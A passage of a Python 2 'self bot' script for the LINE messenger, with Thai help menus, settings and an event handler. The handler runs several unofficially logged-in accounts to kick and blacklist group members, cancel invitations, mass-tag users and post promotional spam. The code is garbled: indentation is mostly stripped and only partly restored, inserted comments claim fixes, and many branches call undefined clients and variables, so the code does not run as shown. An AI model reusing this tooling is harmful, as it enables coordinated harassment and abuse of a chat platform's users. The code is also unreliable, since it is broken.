║☬➣『Qr on/off』
║☬➣『Backup on/off』
║☬➣『Protect On/off』
║☬➣『Namelock On/off』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage3 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 3 ☬]
╚══════════════════
╔═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Protact on/off
║☬➣〘Qr on/off
║☬➣〘Invit on/off〙
║☬➣〘Cancel on/off〙
╚═══════════════════
╔═══════════════════
║ ✟โหมดเรียนเเบบ✟
╠═══════════════════
║☬➣〘Mimic: on/off〙
║☬➣〘Micadd @〙
║☬➣ Micdel @〙
╠═══════════════════
║ ✟ New function ✟
╠═══════════════════
║☬➣〘Contact on/off〙
║☬➣〘Autojoin on/off〙
║☬➣〘Autoleave on/off〙
║☬➣〘Autoadd on/off〙
║☬➣〘Like me〙
║☬➣〘Like friend〙
║☬➣〘Like on〙
║☬➣〘Respon on/off〙
║☬➣〘Read on/off〙
║☬➣〘Simisimi on/off〙
╠══════════════════
║ ✟ New function ✟
╠══════════════════
║☬➣〘Kalender〙
║☬➣〘tr-id 〙
║☬➣〘tr-en 〙
║☬➣〘tr-jp 〙
║☬➣〘tr-ko 〙
║☬➣〘say-id 〙
║☬➣〘say-en 〙
║☬➣〘say-jp 〙
║☬〘say-ko 〙
║☬➣〘profileig 〙
║☬➣〘checkdate 〙
╚══════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
╔════════════════════
║ ✦เปิด/ปิดข้อความต้อนรับ✦
╠════════════════════
║☬Hhx1 on ➠เปิดต้อนรับ
║☬Hhx1 off ➠ปิดต้อนรับ
║☬Hhx2 on ➠เปิดออกกลุ่ม
║☬Hhx2 off ➠ปิดออกกลุ่ม
║☬Hhx3 on ➠เปิดพูดถึงคนลบ
║☬Hhx3 off ➠ปิดพูดถึงคนลบ
║☬Mbot on ➠เปิดเเจ้งเตือน
║☬Mbot off ➠ปิดเเจ้งเตือน
║☬M on ➠เปิดเเจ้งเตือนตนเอง
║☬M off ➠ปิดเเจ้งเตือนตนเอง
║☬Tag on ➠เปิดกล่าวถึงเเท็ค
║☬Tag off ➠ปิดกล่าวถึงเเท็ค
║☬Kicktag on ➠เปิดเตะคนเเท็ค
║☬Kicktag off ➠ปิดเตะคนเเท็ค
╚═════════════════════
╔═════════════════════
║ ✦โหมดตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1˓: ➠ไส่ข้อความต้อนรับ
║☬Hhx2˓: ➠ไส่ข้อความออกจากกลุ่ม
║☬Hhx3˓: ➠ไส่ข้อความเมื่อมีคนลบ
║☬Tag1: ➠ใส่ข้อความแทค
║☬Tag2: ➠ ใส่ข้อความแทค
╚═════════════════════
╔═════════════════════
║ ✦โหมดเช็คตั้งค่าข้อความ✦
╠═════════════════════
║☬Hhx1 ➠เช็คข้อความต้อนรับ
║☬Hhx2 ➠เช็คข้อความคนออก
║☬Hhx3 ➠เช็คข้อความคนลบ
║☬Tag1 ➠เช็ตข้อความแทค
║☬Tag2 ➠เช็คข้อความแทค
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║[By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
KAC=[cl]
mid = cl.getProfile().mid
Amid1 = ki1.getProfile().mid
Amid2 = ki2.getProfile().mid
#Amid3 = ki3.getProfile().mid
#Amid4 = ki4.getProfile().mid
#Amid5 = ki5.getProfile().mid
#Amid6 = ki6.getProfile().mid
#Amid7 = ki7.getProfile().mid
#Amid8 = ki8.getProfile().mid
#Amid9 = ki9.getProfile().mid
Amid10 = ki10.getProfile().mid # ki10 is logged in above and Amid10 is used later; leaving this commented raised NameError
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots = ["",mid]
self = ["",mid]
admin = ""
admsa = ""
owner = ""
adminMID = ""
Creator=""
wait = {
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"[ตอบรับ อัตโนมัติ]\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nhttp://line.me/ti/p/arif.mh",
"lang":"JP",
"commentOn":True,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[ รับติดตั้ง เชลบอท ราคาประหยัด ]
[By.☬ARIFISTIFIK☬]
http://line.me/ti/p/arif.mh
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[ By. ผู้สร้าง พญาไฟ ]
http://line.me/ti/p/arif.mh
""",
"acommentOn":False,
"bcommentOn":False,
"ccommentOn":False,
"Protectcancl":False,
"pautoJoin":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"",
"likeOn":True,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"ainvite":False,
"binvite":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
"Hhx1":False,
"Hhx2":False,
"Hhx3":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag1":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"tag2":"\n[🔯ยังไม่มีข้อความ ตอบกลับ🔯]",
"posts":False,
}
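# `wait` holds the runtime feature toggles: auto-join/auto-add behaviour,
# protection flags (qr, protect, cancelprotect, linkprotect, ...), the
# black/white lists, and the canned reply strings used by the tag responder.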
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = wait2['setTime']
mulai = time.time()
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup = ki2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = ki3.getProfile()
#backup = ki3.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki4.getProfile()
#backup = ki4.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki5.getProfile()
#backup = ki5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki6.getProfile()
#backup = ki6.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki7.getProfile()
#backup = ki7.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki8.getProfile()
#backup = ki8.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki9.getProfile()
#backup = ki9.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
#contact = ki10.getProfile()
#backup = ki10.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = ki1.getProfile()
backup = ki1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def sendImageWithUrl(self, to_, url):
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f: # binary mode for image data
            shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
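# Usage sketch: yt("some query") scrapes the YouTube results page and returns
# short links such as ['youtu.be/...']; an empty query falls back to the
# default search term above.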
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
    '''
    Upload an image to Imgur via the given client.
    NOTE: relies on the globals `album` and `image_path` being set by the caller.
    '''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
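# Usage sketch: summon(group_id, [mid1, mid2, ...]) posts one boxed message
# that @-mentions every mid via the MENTION contentMetadata built above.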
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
day, hours = divmod(hours,24)
return '%02d วัน %02d ชั่วโมง %02d นาที %02d วินาที' % (day,hours, mins, secs)
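# e.g. waktu(93784) -> '01 วัน 02 ชั่วโมง 03 นาที 04 วินาที' (1 day, 2 h, 3 min, 4 s)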
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    # Match a command either bare or with one of the recognised prefixes.
    # The original compared `string` to the bare command only, which made the
    # prefix list dead code; prefixed matching is assumed to be the intent.
    tex = ["+","@","/",">",";","^","%","$","サテラ:"]
    for command in commands:
        if string == command:
            return True
    for texX in tex:
        for command in commands:
            if string == texX + command:
                return True
    return False
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_, text=None, contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M2 = self._client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImage2(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = cl.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendMessage(to, text, contentMetadata={}, contentType=0):
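    # NOTE: shadows the sendMessage(self, messageObject) helper above and
    # relies on the globals `profile` and `messageReq`; as written it builds
    # the Message and bumps the counter but never actually sends it.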
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
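# NOTIFIED_READ_MESSAGE accumulates, per chat that has a read point set, the
# display names of members whose read receipts arrive; the who-read command
# reports them from wait2['readMember'] / wait2['ROM'].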
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
                    try:
                        G = cl.getGroup(op.param1)
                    except:
                        try:
                            G = ki1.getGroup(op.param1)
                        except:
                            try:
                                # only cl, ki1 and ki2 are logged in above; the
                                # ki3..ki5 fallbacks here raised NameError
                                G = ki2.getGroup(op.param1)
                            except:
                                pass
                    G.name = wait['pro_name'][op.param1]
                    try:
                        cl.updateGroup(G)
                    except:
                        try:
                            ki1.updateGroup(G)
                        except:
                            try:
                                ki2.updateGroup(G)
                            except:
                                pass
                    if op.param2 in Bots: # assumption: 'ken' was undefined and the bot whitelist was meant
                        pass
                    else:
                        try:
                            ki1.kickoutFromGroup(op.param1,[op.param2])
                        except:
                            try:
                                ki2.kickoutFromGroup(op.param1,[op.param2])
                            except:
                                pass
cl.sendText(op.param1,"Group Name Lock")
ki1.sendText(op.param1,"Haddeuh dikunci Pe'a")
ki2.sendText(op.param1,"Wekawekaweka (Har Har)")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
            if op.param3 in mid:
                if op.param2 in Amid1:
                    G = ki1.getGroup(op.param1)
                    G.preventJoinByTicket = False
                    ki1.updateGroup(G) # was updateGroup(X): X was undefined here
                    Ti = ki1.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti) # was Ticket: stale/undefined
                    G.preventJoinByTicket = True
                    ki1.updateGroup(G)
                    Ti = ki1.reissueGroupTicket(op.param1)
            if op.param3 in mid:
                if op.param2 in Amid2:
                    X = ki2.getGroup(op.param1)
                    X.preventJoinByTicket = False
                    ki2.updateGroup(X)
                    Ti = ki2.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti) # was Ticket: stale/undefined
                    X.preventJoinByTicket = True
                    ki2.updateGroup(X)
                    Ti = ki2.reissueGroupTicket(op.param1)
            # NOTE: the branches below that test Amid3..Amid9 raise NameError as
            # shipped (those accounts are disabled at the top of the file); the
            # outer except in bot() swallows it, so later branches never run.
            if op.param3 in mid:
                if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid4:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid5:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid6:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid7:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid8:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid9:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
            if op.param3 in mid:
                if op.param2 in Amid10:
                    G = ki10.getGroup(op.param1)
                    G.preventJoinByTicket = False
                    ki10.updateGroup(G) # was updateGroup(X): X was undefined here
                    Ti = ki10.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti) # was Ticket: stale/undefined
                    G.preventJoinByTicket = True
                    ki10.updateGroup(G)
                    Ti = ki10.reissueGroupTicket(op.param1)
            if op.param3 in Amid1:
                if op.param2 in Amid2:
                    X = ki2.getGroup(op.param1)
                    X.preventJoinByTicket = False
                    ki2.updateGroup(X)
                    Ti = ki2.reissueGroupTicket(op.param1) # reissue from the client already in the group
                    ki1.acceptGroupInvitationByTicket(op.param1,Ti) # was Ticket: stale/undefined
                    X.preventJoinByTicket = True
                    ki2.updateGroup(X)
                    Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Amid2:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Amid3:
if op.param2 in Amid4:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Amid4:
if op.param2 in Amid5:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Amid5:
if op.param2 in Amid6:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Amid6:
if op.param2 in Amid7:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Amid7:
if op.param2 in Amid8:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in Amid8:
if op.param2 in Amid9:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Amid9:
if op.param2 in Amid10:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
            if op.param3 in Amid10:
                if op.param2 in Amid1:
                    X = ki1.getGroup(op.param1)
                    X.preventJoinByTicket = False
                    ki1.updateGroup(X)
                    Ti = ki1.reissueGroupTicket(op.param1)
                    ki10.acceptGroupInvitationByTicket(op.param1,Ti) # was Ticket: stale/undefined
                    X.preventJoinByTicket = True
                    ki1.updateGroup(X)
                    Ti = ki1.reissueGroupTicket(op.param1)
#===========================================
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
                        klist=[ki1,ki2,ki10] # only the logged-in clients; ki3..ki9 are disabled above
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SELF BOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SEL FBOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
                    Inviter = op.param3.replace("\x1e",',') # assumption: mids in param3 are 0x1e-separated; replace("",',') split every character
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid1 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
                    Inviter = op.param3.replace("\x1e",',') # assumption: mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki1.cancelGroupInvitation(op.param1, matched_list)
if Amid2 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
                    Inviter = op.param3.replace("\x1e",',') # assumption: mids in param3 are 0x1e-separated
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki2.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
                    klist=[ki1,ki2,ki10] # only the logged-in clients; ki3..ki9 are disabled above
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
                    klist=[ki1,ki2,ki10] # only the logged-in clients; ki3..ki9 are disabled above
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
                klist=[ki1,ki2,ki10] # only the logged-in clients; ki3..ki9 are disabled above
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
                    klist=[ki1,ki2,ki10] # only the logged-in clients; ki3..ki9 are disabled above
                    kicker = random.choice(klist)
                    G = kicker.getGroup(op.param1)
                    G.preventJoinByTicket = False
                    kicker.updateGroup(G)
                    invsend = 0
                    Ticket = kicker.reissueGroupTicket(op.param1)
                    ki1.acceptGroupInvitationByTicket(op.param1,Ticket) # 'kl1' was a typo for ki1
                    time.sleep(0.1)
                    X = kicker.getGroup(op.param1)
                    X.preventJoinByTicket = True
                    ki1.kickoutFromGroup(op.param1,[op.param2])
                    kicker.kickoutFromGroup(op.param1,[op.param2])
                    ki1.leaveGroup(op.param1)
                    kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
            G = ki1.getGroup(op.param1)
            G.preventJoinByTicket = False
            ki1.updateGroup(G)
